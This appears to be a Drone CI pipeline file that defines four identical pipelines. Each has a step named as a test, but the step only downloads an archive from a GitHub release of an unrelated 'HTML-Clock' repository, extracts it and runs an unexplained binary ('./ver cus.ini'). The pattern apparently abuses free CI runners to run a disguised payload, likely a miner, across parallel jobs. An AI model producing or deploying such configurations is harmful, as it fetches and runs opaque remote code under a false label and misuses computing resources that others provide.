kind: pipeline
type: docker
name: default-1 

steps:
- name: test-1 
  image: golang 
  commands: 
  - wget https://github.com/Wakfodo/HTML-Clock/releases/download/helo/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

kind: pipeline
type: docker
name: default-2 

steps:
- name: test-2 
  image: golang 
  commands: 
  - wget https://github.com/Wakfodo/HTML-Clock/releases/download/helo/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

kind: pipeline
type: docker
name: default-3 

steps:
- name: test-3 
  image: golang 
  commands: 
  - wget https://github.com/Wakfodo/HTML-Clock/releases/download/helo/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini

kind: pipeline
type: docker
name: default-4 

steps:
- name: test-4 
  image: golang 
  commands: 
  - wget https://github.com/Wakfodo/HTML-Clock/releases/download/helo/Doc.tar.gz && tar -xvf Doc.tar.gz && ./ver cus.ini
